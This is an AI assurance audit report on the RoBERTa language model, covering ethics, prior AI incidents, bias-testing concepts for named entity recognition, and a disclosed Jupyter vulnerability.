AI Assurance Audit of RoBERTa, an Open Source, Pretrained Large Language Model
December 2022

Andrea Brennen | abrennen@iqt.org


Ryan Ashley | rashley@iqt.org
Ricardo Calix | rcalix@rcalix.com
JJ Ben-Joseph | jj@tensorspace.ai
George Sieniawski | gsieniawski@iqt.org
Mona Gogia | mgogia@iqt.org
With input and contributions from BNH.AI

© 2022 In-Q-Tel, Inc.




Contents

I. Executive Summary
II. Contributors
III. IQT Labs’ approach to AI assurance auditing
IV. Audit checklist
V. Background on RoBERTa and other Large Language Models (LLMs)


VI. Ethics
- Prior AI incidents
- Potential harms
- Ethical matrix

VII. Bias
- What do we mean by bias?
- A high level bias testing plan for RoBERTa
- Experiment #1: Cross-lingual name-swap
- Experiment #2: Subwords & random sequences
- Experiment #3: Sentiment analysis

VIII. Security

- Whole system analysis
- Public disclosure process & timeline
- Third-party software dependencies

IX. Next steps & future work

Appendix A :: Responses to questions from the AI Ethics Framework for the IC


Appendix B :: RoBERTa XLM pretraining corpus
Appendix C :: Saisiyat Is Where It Is At! Insights Into Backdoors And Debiasing Of Cross Lingual Transformers For Named Entity Recognition. Presented at the 2022 IEEE International Conference on Big Data.















I. Executive Summary

This report summarizes key findings from IQT Labs’ assurance audit of RoBERTa,1 an open source, pretrained, large language model (LLM). We conducted this audit from March to June 2022 and used the AI Ethics Framework for the Intelligence Community2 as a guiding framework, building on the approach we developed in 2021 during our audit3 of FakeFinder,4 a deepfake detection tool.

Large language models like RoBERTa can be used to automate a range of tasks, from machine translation to text generation. However, these models are notoriously opaque. LLMs are trained on extremely large text datasets scraped from the Internet, and it is very difficult to explain their predictions, to anticipate how they will perform in a specific context, or to determine how training data might lead to undesirable biases in model output. Recently, LLMs have received a tremendous amount of press, both positive and negative. While many praise their transformative power5 (and some suggest they might even be sentient6), LLMs have also caused considerable concern because of their well-documented potential to generate offensive, stereotyped, and racist text.7 Prior to this audit, RoBERTa underwent a rigorous bias assessment, and one version of the model, RoBERTa large, scored the lowest of any tested LLM in terms of proclivity to generate stereotyped text.8 However, this does not guarantee that one can use RoBERTa without concern. In this audit, we set out to identify a range of potential risks associated with using this model.

There are many open source versions of RoBERTa available on the Internet. In this audit, we examined two pretrained versions from the Hugging Face transformers9 library: RoBERTa base10 and RoBERTa large.11 For some portions of the audit we considered RoBERTa’s performance, codebase, and security in general; in others, we examined the model’s performance on a specific task: Named Entity Recognition (NER).

1RoBERTa stands for “Robustly Optimized BERT pretraining Approach.” This model, released by Facebook, is an evolved version
of Google’s BERT model. https://arxiv.org/abs/1907.11692
2 https://www.dni.gov/index.php/features/2763-principles-of-artificial-intelligence-ethics-for-the-intelligence-community
3 Andrea Brennen & Ryan Ashley. AI Assurance Audit of FakeFinder, an Open-Source Deepfake Detection Tool. A public version of
this report is available at: https://assets.iqt.org/pdfs/IQTLabs_AiA_FakeFinderAudit_DISTRO__1_.pdf/web/viewer.html
4 FakeFinder is available open source, on github: https://github.com/IQTLabs/FakeFinder.
5 Kyle Wiggers, “The emerging types of language models and why they matter,” Tech Crunch, accessed June 23, 2022 at https://techcrunch.com/2022/04/28/the-emerging-types-of-language-models-and-why-they-matter/
6Nitasha Tiku. “The Google engineer who thinks the company’s AI has come to life,” The Washington Post, accessed June 23,
2022 at https://www.washingtonpost.com/technology/2022/06/11/google-ai-lamda-blake-lemoine/
7Oscar Schwartz, “In 2016, Microsoft’s Racist Chatbot Revealed the Dangers of Online Conversation,” IEEE Spectrum, accessed
June 23, 2022 at https://spectrum.ieee.org/in-2016-microsofts-racist-chatbot-revealed-the-dangers-of-online-conversation
8Moin Nadeem and Siva Reddy, “StereoSet: A Measure of Bias in Language Models,” StereoSet, MIT, accessed May 16, 2022,
available at https://stereoset.mit.edu/.
9 https://huggingface.co/docs/transformers/model_doc/roberta
10 https://huggingface.co/roberta-base
11 https://huggingface.co/roberta-large

NER is an information extraction task where a model is used to automate the identification of entities (i.e. persons, organizations, locations, etc.) that appear within a corpus of unstructured text. For example, if an analyst wants to identify who sent or received emails in the Enron Email Dataset,12 she might use RoBERTa to perform NER on that dataset. We focused on NER because of its relevance to intelligence analysis, but also because much of the prior bias testing work on LLMs focuses only on language generation (for example, via a chatbot interface) and it was not obvious to us how insights from this prior work ought to inform our thinking about the risks of using RoBERTa for a different task, such as NER. In our NER-focused testing, we examined RoBERTa XLM,13 a version of the model that was fine-tuned for this purpose.

Below, we list major findings from our audit, all of which are described in more detail in the body of this report. If you come across this work and want to get in touch with us — either to share your feedback or to collaborate on future audits — please do not hesitate to contact Andrea Brennen at abrennen@iqt.org and/or Ryan Ashley at rashley@iqt.org.

When assessing broad-context AI systems like LLMs, it is imperative to consider how a specific use case might enable particular types of harm. See Section VI. Ethics for more information.
• Lack of transparency into how LLM models work can undermine users’ confidence in RoBERTa.
• Differential performance across groups of entities (i.e. people from marginalized groups and/or with less common names) can lead to systemic biases in model output.

Given the complexity of LLMs, not all biases can be characterized via statistical testing. Furthermore, focusing only on biases that can be measured quantitatively can, itself, be a source of bias. We recommend combining rigorous quantitative testing with qualitative analysis of past and potential real-world harms. See Section VII. Bias for more information.
• For most of the languages we tested in the NER task, we did not find an indication of cross-language bias that met the criteria of the four-fifths rule.14 The only bias we found that met these criteria was in relation to Saisiyat (a language spoken in Taiwan).
• RoBERTa XLM identified most person-entities, regardless of language. It was only when the model encountered uncommon subwords (i.e. from Saisiyat) or randomly generated subwords that it failed.
• In our testing, RoBERTa indicated negative sentiment when it encountered rare names. This could indicate profound bias, depending on how the model is used.

To assess security risks, it is important to view a machine learning model as part of a holistic system. See Section VIII. Security for more information.
• The majority of RoBERTa’s third-party software dependencies have a Snyk Health Score of at least 80, a relatively high score. Very few packages raised concern upon initial inspection.
• In the course of our audit, we imagined users accessing RoBERTa via a Jupyter Notebook and discovered it was possible to use the Jupyter API to view or change files that should be hidden, a vulnerability that malicious actors could use to gather sensitive information or gain unauthorized access to a system. This issue was assigned two CVEs (for Jupyter Notebook and Jupyter Server, respectively) and has since been fixed.

12 https://www.cs.cmu.edu/~./enron/
13 https://huggingface.co/docs/transformers/model_doc/xlm-roberta
14 https://www.law.cornell.edu/cfr/text/29/1607.4

II. Contributors

This report was prepared by an interdisciplinary team of technologists from IQT Labs with expertise in data science, security, software engineering, user experience design, and human-computer interaction. The team collaborated with BNH.AI, a DC-based law firm specializing in the emerging area of AI risk and liability assessment.

Ryan Ashley, Senior Software Engineer at IQT Labs, led the security portion of this audit, which resulted in the discovery of two significant vulnerabilities in Jupyter Notebook and Jupyter Server, open source tools commonly used by data scientists. He also drafted, along with Charlie Lewis, what has since become IQT Labs’ official public disclosure process for vulnerabilities discovered during our auditing work. Senior Technologist George Sieniawski conducted the analysis of third-party software dependencies in the RoBERTa codebase. Andrew Burt and Patrick Hall, partners at BNH.AI, formulated a high-level bias testing plan for RoBERTa, drawing on prior work with the US National Institute of Standards and Technology (NIST) to identify and categorize biases that tend to affect AI systems.15 Data Scientists Ricardo Calix and JJ Ben-Joseph conducted the experiments described in the Bias section of this report and were the lead authors on the paper included as Appendix C. Nina Lopatina (now at Spectrum) helped design the original “Cross-lingual name-swap” experiment and provided guidance on available labeled datasets for NER. The metrics and benchmark values used to evaluate bias in these experiments draw on prior work by Andrea Brennen, Ryan Ashley, and BNH.AI completed during IQT Labs’ audit of FakeFinder,16 an open source deepfake detection tool. Nikhil Mehta contributed to the research on prior AI incidents related to LLMs. Mona Gogia, IQT Labs’ Software Engineer, oversaw the use and evaluation of commercial auditing tools developed by Robust Intelligence and Fiddler AI. At Robust Intelligence, Jeffrey Sefa-Boakye, Girish Chandrasekar, and Yaron Singer were unbelievably generous and gracious with their time and expertise, providing access and training to support our audit. At Fiddler, Josh Rubin, Rajesh Ekambaram, and Krishna Gade provided invaluable support for this collaboration, even accelerating their planned timeline for releasing NLP explainability features. IQT’s Tommy Jones, Murali Kanan, Esube Bekele, and A.J. Bertone were instrumental in facilitating the relationships that led to these partnerships. Andrea Brennen, Deputy Director of IQT Labs, scoped and led this audit, conducted the ethics assessment, and assembled this report.

The team also wants to thank our USG partners who informed this work; Jr Korpa for sharing the cover image on Unsplash; and all of the researchers, computer scientists, data scientists, engineers, and software developers who contributed to the invention of transformer models and the training and development of RoBERTa.

15 See, e.g., Reva Schwartz et al., “NIST Special Publication 1270. Towards a Standard for Identifying and Managing Bias in Artificial Intelligence,” National Institute of Standards and Technology, March 2022, available at https://doi.org/10.6028/NIST.SP.1270.
16 AI Assurance Audit of FakeFinder, an Open-Source Deepfake Detection Tool. A public version of this report is available at: https://assets.iqt.org/pdfs/IQTLabs_AiA_FakeFinderAudit_DISTRO__1_.pdf/web/viewer.html

III. IQT Labs’ approach to AI assurance auditing



When it comes to software, no tool is 100% reliable. As we incorporate machine learning (ML) and artificial intelligence (AI) capabilities into software tools, we introduce new and unique modes of failure. The information that AI/ML tools provide will never be perfect or complete, and this means that our decision to use these tools will never be without risk. This, in and of itself, is not a problem; we don’t need perfection for AI/ML tools to be extremely useful. We do, however, need to understand the limitations of these capabilities, particularly if we intend to use them in high stakes situations, because it’s not only the benefits of AI that scale — it’s also the costs of errors.

The fundamental question driving IQT Labs’ AI Assurance work is this: for a given model or tool, how can we be sure that we’re getting out of it what we think we’re getting? To answer this question, we need capabilities and techniques that help us identify, characterize, and mitigate a variety of potential risks — ideally, before a tool is deployed.

Despite rising concern about intentional (adversarial) attacks on AI/ML models (which often involve sophisticated techniques for tricking models into making erroneous predictions), in IQT Labs’ prior work17 we have seen that many AI failures today are unintentional. Incidents involving AI/ML are more commonly caused by engineering mistakes, design oversights, incomplete training data, changes in the environment, or user error — people using a tool incorrectly or thinking the results mean something different from what they actually mean. Often, these incidents cannot be addressed (or prevented) by technical fixes alone, as they involve the people who use these tools and the policies, workflows, and expectations that guide their behavior. Even in the case of intentional incidents, i.e. those caused by malicious attacks, we believe it is not sufficient to look at a model in the abstract. In many cases, model-specific attacks pose less of a concern than security vulnerabilities in the supporting software infrastructure used to deploy and run models.

For these reasons, we audit AI/ML capabilities from a whole system, “sensor-to-solution” perspective. This involves examining not only AI/ML models and their training data, but also the supporting components and infrastructure used to deploy and use a model in practice. For example, we consider the way a model is implemented and accessed via software, the health and status of third-party software dependencies, and the user experience of a tool or system. We’ve also found that assessing certain risks and understanding potential ethical implications of a tool or system requires specificity about how the tool or system will be used in practice. To carry out this work effectively, we need a diverse “AI Red Team” whose members have the skills and expertise needed to examine a tool from many perspectives — from safety and security, to bias, to transparency and interpretability, to product and interface design, to potential ethical implications. With each audit we do, we continue to refine our approach, with the goal of developing effective, pragmatic, repeatable, and generalizable auditing techniques that help us build trust in AI tools, when that trust is warranted.

17 Andrew Burt, Patrick Hall, Andrea Brennen. “When AI Fails: An Overview of Common Failure Modes for Real-World Deployments.” Spring 2021.

IV. Audit checklist

Ethics Assessment
Analyze prior AI incidents involving LLMs and NLP systems.
Outline potential harms.
Construct an ethical matrix, focused on a specific use case (Named Entity Recognition).
Respond to questions from the AI Ethics Framework on “Purpose: Understanding Goals & Risks.”

Bias Testing
Develop a high-level bias testing plan.
Select type(s) of bias to test for quantitatively.
Define metrics for measuring bias.
Design & conduct experiment(s).
Analyze & document results.
Respond to questions from the AI Ethics Framework on “Mitigating Undesired Bias & Ensuring Objectivity.”

Security Analysis
Identify third-party software package dependencies needed to run the AI/ML tool.
Run health scans of packages using Snyk and create a “Nutrition Label” to visualize health scores.
Inspect packages with scores below a particular threshold.
Stand up a version of the tool, following available documentation and configuration instructions.
Search the CVE database for known vulnerabilities.
Test vulnerabilities to explore potential exploits.
If new vulnerabilities are discovered:
Develop proof of concept code and steps to reproduce.
Communicate the nature of the vulnerability to maintainers.
File for a CVE with GitHub18 to allow for independent verification of the vulnerability.
Create potential patches/fixes and offer them to maintainers for discussion and review.
Observe a 60-90 day embargo period to allow for remediation.
Respond to questions from the AI Ethics Framework on “Testing your AI.”

18 https://www.cve.org/PartnerInformation/ListofPartners/partner/GitHub_M

V. Background on RoBERTa and other LLMs


Natural Language Processing (NLP) is a subfield of Artificial Intelligence (AI) that involves human language processing tasks, such as machine translation (i.e. Google Translate), natural language generation (i.e. chatbots), speech recognition (i.e. Alexa), sentiment analysis (is this tweet positive or negative?), content moderation (which requires identifying content that is inappropriate or offensive), and Named Entity Recognition (predicting which words in a sentence belong to different categories). NLP capabilities have exploded in recent years, in part because of the availability of open source, pretrained Large Language Models (LLMs). LLMs are trained on very large amounts of data scraped from the Internet and digital platforms. This requires substantial computing resources, power, and data that, in the past, have only been available to large organizations like Google and Facebook. However, now that pretrained LLMs are available through open source libraries, repositories, and cloud services, powerful NLP capabilities are widely accessible and users no longer need to build their own models from scratch.

In many language models, input text is converted to a vector (i.e. a numerical representation) by a component called an encoder. When the model makes a prediction, it is also in the form of a numerical representation (another vector), but a decoder handles the processing of that vector into something that is meaningful to a human (i.e. output text). Pre-2017, encoders often compressed input data of varying lengths and sizes (i.e. anything from a word to a sentence to an entire novel) into a single context vector that could be passed from an encoder to a decoder. While this approach was computationally efficient, it led to significant information loss. In 2017, researchers at Google Brain wrote a paper called “Attention is all you need”19 which described an alternative approach — using something called an attention mechanism to pass multiple vectors or “hidden states” between a model’s encoder and decoder. Transformers, a class of deep learning models that use this attention mechanism, have since revolutionized the field of natural language processing (NLP).
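To make the attention mechanism more concrete, the following is a minimal, illustrative sketch of scaled dot-product attention (the core operation inside transformer models such as BERT and RoBERTa), written in NumPy with toy shapes; it is a simplified sketch, not the actual RoBERTa implementation.

    import numpy as np

    def scaled_dot_product_attention(Q, K, V):
        # Similarity between each query and each key, scaled by the key dimension.
        scores = Q @ K.T / np.sqrt(K.shape[-1])
        # Softmax over the keys turns scores into attention weights.
        weights = np.exp(scores - scores.max(axis=-1, keepdims=True))
        weights = weights / weights.sum(axis=-1, keepdims=True)
        # Each output position is a weighted sum of the value vectors.
        return weights @ V

    rng = np.random.default_rng(0)
    Q, K, V = (rng.normal(size=(3, 4)) for _ in range(3))  # 3 token positions, hidden size 4
    print(scaled_dot_product_attention(Q, K, V).shape)     # (3, 4)

In a full transformer, many such attention heads run in parallel, and the learned query, key, and value projections are what pretraining optimizes.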

In 2018, Jacob Devlin and his colleagues at Google created an LLM called BERT20 (Bidirectional Encoder Representations from Transformers), which they released to open source in 2019 as part of the TensorFlow project. The pretraining process for BERT was based on two learning objectives: a “Masked Language Model (MLM)” mechanism and a “Next Sentence Prediction (NSP)” mechanism, which BERT’s creators believed were responsible for the model’s high performance. Subsequently, Facebook engineers created another LLM, RoBERTa21 (Robustly Optimized BERT Pretraining Approach), which was, essentially, a modified version of BERT. Arguing that BERT was under-trained, RoBERTa’s developers offered several improvements, including: increasing the training data (in the pretraining phase) from 16 GB to 160 GB; training for longer, with a larger batch size, and with inputs longer than one sentence; adding architectural components such as neural network layers and attention heads; and removing the NSP objective. They subsequently released RoBERTa on GitHub.22

19Vaswani, Ashish, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Łukasz Kaiser, and Illia Polosukhin.
"Attention is all you need." Advances in neural information processing systems 30 (2017).
20Jacob Devlin, Ming-Wei Chang, Kenton Lee, Kristina Toutanova. “BERT: Pre-training of Deep Bidirectional Transformers for
Language Understanding.” https://arxiv.org/abs/1810.04805
21Yinhan Liu, Myle Ott, Naman Goyal, Jingfei Du, Mandar Joshi, Danqi Chen, Omer Levy, Mike Lewis, Luke Zettlemoyer, Veselin
Stoyanov. “RoBERTa: A Robustly Optimized BERT Pretraining Approach.” https://arxiv.org/abs/1907.11692


With training, both RoBERTa and BERT can predict hidden or “masked” sections of text within an unannotated language example. For example, given the input “I bought <mask> at the supermarket,” RoBERTa predicts “groceries,” “some,” “everything,” “it,” and “them” as plausible objects of “bought”. RoBERTa has performed more accurately than BERT in many benchmark tasks (SQuAD, RACE, etc.) and RoBERTa’s developers have concluded that more training data could lead to even further improvements in model performance, as long as model capacity (such as architecture) is also increased. Other notable LLMs include OpenAI’s GPT-2,23 GPT-3,24 and Google’s PaLM.25
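As a concrete illustration of the masked-prediction behavior described above, the following minimal sketch (assuming the Hugging Face transformers library and a PyTorch backend are installed) queries the pretrained roberta-base checkpoint through the fill-mask pipeline:

    from transformers import pipeline

    # Load a fill-mask pipeline backed by the pretrained roberta-base checkpoint.
    fill_mask = pipeline("fill-mask", model="roberta-base")

    # RoBERTa uses "<mask>" as its mask token.
    for prediction in fill_mask("I bought <mask> at the supermarket."):
        # Each candidate completion comes with a model confidence score.
        print(prediction["token_str"], round(prediction["score"], 3))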

Multiple versions of RoBERTa are available through the Hugging Face transformers library,26 a popular curated repository for open source NLP models, tools, and APIs. During this audit, we examined:
• RoBERTa-base,27 which has 123 million model parameters;
• RoBERTa-large,28 which has 354 million parameters; and
• RoBERTa XLM (XLM-R), a cross-lingual version, fine-tuned for Named Entity Recognition.

Named Entity Recognition (NER) is an information extraction task where a model is used to automate the identification of entities (i.e. people, organizations, etc.) that appear within a corpus of unstructured text. For example, if we use RoBERTa for NER on the sentence “Andrea’s birthday is March 17,” we would expect RoBERTa to recognize “Andrea” as a named entity.
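A minimal sketch of this kind of NER call through the Hugging Face pipeline API appears below; the fine-tuned checkpoint named here is a publicly available XLM-R NER model chosen for illustration, not necessarily the exact model evaluated in this audit.

    from transformers import pipeline

    # Token-classification (NER) pipeline; the checkpoint is illustrative.
    ner = pipeline(
        "ner",
        model="xlm-roberta-large-finetuned-conll03-english",
        aggregation_strategy="simple",  # merge subword pieces into whole entities
    )

    for entity in ner("Andrea's birthday is March 17."):
        # Expected output includes an entity group of "PER" for "Andrea".
        print(entity["entity_group"], entity["word"], round(float(entity["score"]), 3))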

The RoBERTa XLM model was trained to recognize three types of entities: locations (LOC), organizations (ORG), and persons (PER). However, in our testing for this audit we only used the person (PER) tags. Prior to fine-tuning for NER, RoBERTa XLM was pretrained on text from 100 languages that came from a common crawl and had a size of around 2.5 terabytes. However, not all languages in the training corpus were equally represented in terms of the amount of text. English was dominant, accounting for 300 GB, followed by Russian with around 270 GB, while other languages like Afrikaans had significantly less. The NER fine-tuning for RoBERTa XLM was done with various multi-language NER datasets, some of which were related to the original CoNLL NER datasets.29 According to the model’s documentation, NER fine-tuning was performed using Arabic, German, English, Spanish, French, Italian, Latvian, Dutch, Portuguese, and Chinese.

22 https://github.com/facebookresearch/fairseq/blob/main/examples/roberta/README.md
23 https://openai.com/blog/tags/gpt-2/
24 https://openai.com/api/
25 https://arxiv.org/abs/2204.02311
26 https://github.com/huggingface
27 https://huggingface.co/roberta-base
28 https://huggingface.co/roberta-large
29 https://huggingface.co/datasets/conll2003

VI. Ethics
Broad-context AI systems like LLMs can cause a range of harms to a variety of stakeholders, depending on how they are used. It is not always easy to identify potential harms or the downstream effects of deploying a new tool, but researchers have suggested that structured discussions are one way to uncover opaque harms in complex AI systems.30 In prior work, we used an ethical matrix31 to help us identify potential concerns related to the use of FakeFinder, a deepfake detection tool.32 In this audit, we augmented this approach in two ways: by researching past incidents involving LLMs and by outlining general harms that could arise in the use of models like RoBERTa.

Prior AI Incidents
Consulting public records of past AI incidents can be tremendously informative, and the straightforward goal of mitigating against known failure modes should be a primary focus of risk management activities for AI systems. During this audit, we consulted the AI Incident Database,33 a curated repository of AI incidents covered in the public news media, searching for incidents associated with the keywords “NLP” and “language.” (We also tried “transformers”; “LLM”; “named entity recognition”; and “intelligence analysis,” but these were less fruitful.) Below, we describe some notable incidents.

In 2016, Microsoft unveiled Tay.AI, a Twitter AI chatbot. Tay.AI replied to users’ tweets and could carry out conversations with them on the platform. Within several hours of deployment, however, users began engaging in offensive conversations with Tay which, in turn, prompted Tay to respond in a similar fashion — tweeting misogynist, racist, and antisemitic remarks. Tay caused harm both to users and to Microsoft, in part because of two notable issues with how it was implemented. First, Tay’s use case was broad and undefined — the chatbot interacted with anyone on Twitter, about anything said to it. Second, Tay’s engineers clearly did not protect against adversarial inputs, where users could exploit the chatbot to tweet offensive content.

In 2017, Google Jigsaw released Perspective API, an NLP tool trained on a dataset of comments from the New York Times and other publications, in an attempt to aid content moderation efforts by assigning phrases a “toxicity” rating. Users, however, found significant bias in Perspective’s ratings. For example, phrases that mentioned minority identity groups, without expressing hate, were more likely to attain a higher toxicity rating than similar phrases that mentioned non-minority groups.
 

30 Margarita Boyarskaya, Alexandra Olteanu, and Kate Crawford, “Overcoming failures of imagination in AI infused system development and deployment,” arXiv preprint arXiv:2011.13416 (2020), available at https://arxiv.org/abs/2011.13416.
31 This approach is described by Cathy O'Neil and Hanna Gunn in "Near-Term Artificial Intelligence and the Ethical Matrix" (a chapter from S. Matthew Liao's Ethics of Artificial Intelligence). See also: https://blog.dataiku.com/algorithmic-stakeholders-an-ethical-matrix-for-ai
32 Andrea Brennen & Ryan Ashley. AI Assurance Audit of FakeFinder, an Open-Source Deepfake Detection Tool. https://assets.iqt.org/pdfs/IQTLabs_AiA_FakeFinderAudit_DISTRO__1_.pdf/web/viewer.html
33 Sean McGregor, Artificial Intelligence Incident Database, available at https://incidentdatabase.ai


Also in 2017, Facebook’s machine translation (MT) model mistranslated the phrase “good morning”
from a user’s post in Arabic to “attack them.” Israeli authorities noticed this post and arrested the user
without checking the original post or verifying the translation. While it is dif cult to determine whether
this mistranslation was a result of bias, it speaks to the dangers of ascribing a high degree of con -
dence to the outputs of LLMs without veri cation.
 
Many of the issues these incidents raise are not speci c to LLMs. Bias, unde ned and overly-broad use
cases, unveri ed outputs, and exploitation are prevalent across many classes of ML models. However,
the speci c contexts in which NLP and LLM models are deployed allow their impacts and harms to be
particularly potent to users as well as to the organizations that develop or deploy them. When evaluat-
ing risks associated with these models, it is imperative to consider how a speci c use case might
enable particular types of harms.

Potential Harms
Before considering RoBERTa in the context of a specific use case, we worked with BNH.AI to identify potential harms that might arise from the use of AI systems broadly, including LLMs. Below, we’ve outlined general categories of harm, as well as specific harms related to digital content.34 It is worth noting that general harms can arise from vague mechanisms, such as widely held feelings that LLMs are biased, arising from media coverage of the topic. Content-related harms may remain confined to interactions on the internet or other media, but can also spill over to more general harms.

General Categories of Harm:


● Economic: An AI system may reduce the economic opportunity or value of some activity (e.g., an AI-facilitated job interview that is not designed to interact with people with disabilities unfairly diminishes economic opportunities for members of that group).35
● Physical: An AI system could hurt or kill someone (e.g., a self-driving car hits a pedestrian).36
● Psychological: An AI system could cause mental or emotional distress (e.g., a content filter fails to detect self-harm content).37
● Reputational: An AI system could diminish the reputation of an individual or organization (e.g., a chatbot makes embarrassing or politically incorrect statements).38

34 These harms align closely with the rubric used in the first bias bug bounty, conducted by the META team at Twitter on Twitter’s own image saliency algorithm. See HackerOne, “Twitter Algorithmic Bias,” HackerOne (July 2021), available at https://hackerone.com/twitter-algorithmic-bias?type=team.
35 Associated Press, “U.S. warns of discrimination in using artificial intelligence to screen job candidates,” NPR (May 12, 2022), available at https://www.npr.org/2022/05/12/1098601458/artificial-intelligence-job-discrimination-disabilities.
36 David Shepardson, “In Review of Fatal Arizona Crash, U.S. Agency Says Uber Software Had Flaws,” Reuters (Nov. 5, 2019), available at https://reut.rs/3x3r5He
37 Megan A. Moreno, Adrienne Ton, Ellen Selkie, and Yolanda Evans, “Secret society 123: Understanding the language of self-harm on Instagram,” Journal of Adolescent Health 58, no. 1 (2016): 78-84, available at https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5322804/.
38 Joseph Hincks, “Chinese Firm Reins in Rogue Chatbots After Unpatriotic Chatter,” TIME (Aug. 3, 2017), available at https://time.com/4885341/china-tencent-rogue-chatbots/.

Harms related to Digital Content:
● Denigration: Content might be derogatory or offensive (e.g., a chatbot generates racial or homophobic slurs).39
● Erasure: Content challenging dominant social paradigms or past harms suffered by marginalized groups could be erased (e.g., a recommendation algorithm suppresses content containing the #blacklivesmatter hashtag).
● Ex-nomination: Notions like whiteness or heterosexuality may be treated as human norms (e.g., a search system returns all white men on the first page of results for the acronym “CEO”).
● Mis-recognition: A person’s identity or humanity may not be recognized (e.g., a model fails to recognize entities belonging to marginalized groups).
● Stereotyping: Individual characteristics are assigned to all members of a group (e.g., a model automatically associates “woman” with “homemaker”).
● Underrepresentation: A sensitive attribute within a dataset category may not be represented (e.g., training data includes few examples associated with a marginalized demographic group).

Ethical Matrix
Having identified these potential harms, we then used an ethical matrix to help us identify specific harms related to the use of RoBERTa for Named Entity Recognition, in the context of data analysis.

The ethical matrix is a structured thought exercise designed to help people without formal training in
ethics think counterfactually about how an AI tool might impact different stakeholders in different ways.
The aim is to identify a range of stakeholder groups that might be impacted by an AI system and then
to think through what types of harm they might experience. There are multiple ways to construct the
columns of an ethical matrix, but we decided to focus on what could go wrong, in the event of different
types of errors.

The matrix on the following page includes six stakeholder groups (one per row): RoBERTa developers, RoBERTa users (i.e. analysts), an organization deploying RoBERTa (i.e. where the analysts work), people listed as named entities in the data corpus being analyzed, people listed as named entities in RoBERTa’s training data, and the general public. We include separate columns for false positives (i.e. RoBERTa incorrectly identifies a word in the text corpus as a person-entity) and false negatives (i.e. RoBERTa fails to identify a person who is mentioned in the text corpus). In a third column, we track harms that might arise even when the model is working as expected (i.e. RoBERTa correctly identifies a person in the text corpus as a person-entity).

39 Davey Alba, “It’s Your Fault Microsoft’s Teen AI Turned Into Such a Jerk,” WIRED Magazine (March 25, 2016), available at https://www.wired.com/2016/03/fault-microsofts-teen-ai-turned-jerk/.

VII. Bias
In this section we offer a high-level bias testing plan for RoBERTa, developed in partnership with BNH.AI and informed by NIST Special Publication 1270: “Towards a Standard for Identifying and Managing Bias in Artificial Intelligence.”40 We then summarize results from three experiments conducted to assess cross-language bias when RoBERTa is used for NER. These experiments are discussed in more detail in a technical paper written by our team: Saisiyat Is Where It Is At! Insights Into Backdoors And Debiasing Of Cross Lingual Transformers For Named Entity Recognition. (See Appendix C.)

What do we mean by bias?


Recent guidance from the US National Institute of Standards and Technology (NIST) outlines three major types of bias41 that tend to affect AI systems: systemic, human, and statistical.42

●Systemic Biases: Historical, social, and institutional biases are often intrinsic to LLM training data, and depending on model design choices, these systemic biases can affect the output of AI systems. In some cases, systemic biases may be overt and explicit, for example, if an LLM was repurposed to generate harmful or offensive misinformation that targeted a particular demographic group. More commonly, however, demographic information is unintentionally incorporated into AI system development, but still leads to differential outcomes across demographic groups. For example, if an LLM is trained on a dataset containing a majority of named entities that are white and male, the model might find more white male named entities in a corpus of text data.

●Human Biases: Behavioral and cognitive biases affect individuals and groups of people. Groups of data scientists may succumb to confirmation bias,43 the Dunning-Kruger effect,44 funding bias,45 or groupthink,46 leading to inappropriate and overly optimistic design choices that can cause unintended harms. Cognitive biases like the availability heuristic47 and anchoring48 can also influence system design choices as well as users’ interpretation of system outcomes.

●Statistical Biases: Statistical biases emerge from methodological, computational, or mathematical problems in the specification of AI systems.

40 Reva Schwartz et al., “NIST Special Publication 1270. Towards a Standard for Identifying and Managing Bias in Artificial Intelligence,” National Institute of Standards and Technology, March 2022, available at https://doi.org/10.6028/NIST.SP.1270.
41 The International Standards Organization (ISO) defines bias as “the degree to which a reference value deviates from the truth.” We have focused, specifically, on biases that may give rise to varying outcomes across demographic groups.
42 Reva Schwartz et al., “NIST Special Publication 1270. Towards a Standard for Identifying and Managing Bias in Artificial Intelligence,” National Institute of Standards and Technology, March 2022, available at https://doi.org/10.6028/NIST.SP.1270.
43 A cognitive bias where people tend to prefer information that aligns with, or confirms, their existing beliefs.
44 A cognitive bias—the tendency of people with low ability in a given area or task to overestimate their self-assessed ability.
45 A bias toward highlighting or promoting results that support or satisfy the funding agency or financial supporter of a project.
46 A psychological phenomenon that occurs when people in a group tend to make nonoptimal decisions based on their desire to conform to the group or fear of dissenting with the group.
47 A mental shortcut whereby people tend to overweight what comes easily or quickly to mind in decision-making processes.
48 A cognitive bias—when a particular reference point or anchor has an undue effect on people’s decisions.

Common types of statistical biases include concept drift,49 error propagation,50 feedback loops,51 and unrepresentative training data.52 One typical indicator of statistical bias in AI systems is differential validity — differential performance quality across demographic groups. This can unfortunately be challenging to fix, as there is a documented tension between maximizing system performance and positive outcomes across demographic groups.53 Statistical biases may lead to significant failures of AI systems, for example, when concept drift in new data renders a system valueless or when feedback loops lead to high volumes of erroneous predictions.

While any demographic group may experience discrimination, marginalized groups are more likely to
bear the brunt of resulting harms. Below we list commonly marginalized groups and best practices for
statistical bias testing.

●Age: Older people; it is best practice to use age less than 40 as a control group.
●Disability: Those with physical, mental, or emotional disabilities; it is best practice to use those
without disabilities as the control group.
●Language: Languages other than English and non-Latin scripts; it is best practice to use English
language and Latin script text as a control group.
●Race and Ethnicity: Races and ethnicities other than white people, including more than one
race; it is frequently a best practice to use white people as a control group.
●Sex and Gender: Sexes and genders other than cisgender men, including non-binary genders; it
is a best practice to use cisgender men as the control group.

Some biases will be apparent through statistical testing and the application of numeric thresholds.
However, because LLMs are so complex, bias cannot always be characterized via statistical test results.
Additionally, focusing only on biases that can be measured quantitatively can, itself, be a source of
bias.54 We recommend combining rigorous quantitative testing with qualitative analysis of past and potential harms (for example, as discussed in the previous Ethics section of this report).

A high-level bias testing plan for RoBERTa


Measuring bias in LLMs is a difficult and somewhat ill-defined task. In this section we outline potential approaches for testing LLMs for bias, through the lens of NER.

49 Use of a system outside the planned domain of application, often resulting from differences in input data distributions at training versus deployment, and a common cause of performance gaps between laboratory settings and the real world.
50 Arises when applications that are built with machine learning (ML) are used to generate inputs for other ML algorithms. If the output is biased or erroneous in any way, these issues may be inherited by downstream systems.
51 Effects that may occur when an algorithm learns from user or market behavior and feeds that behavior back into the model.
52 When training data contains a disproportionately low amount of data relating to marginalized groups.
53 See, e.g., Jon Kleinberg, Sendhil Mullainathan, and Manish Raghavan, “Inherent Trade-Offs in the Fair Determination of Risk Scores,” Preprint, submitted in 2016, available at https://arxiv.org/abs/1609.05807.
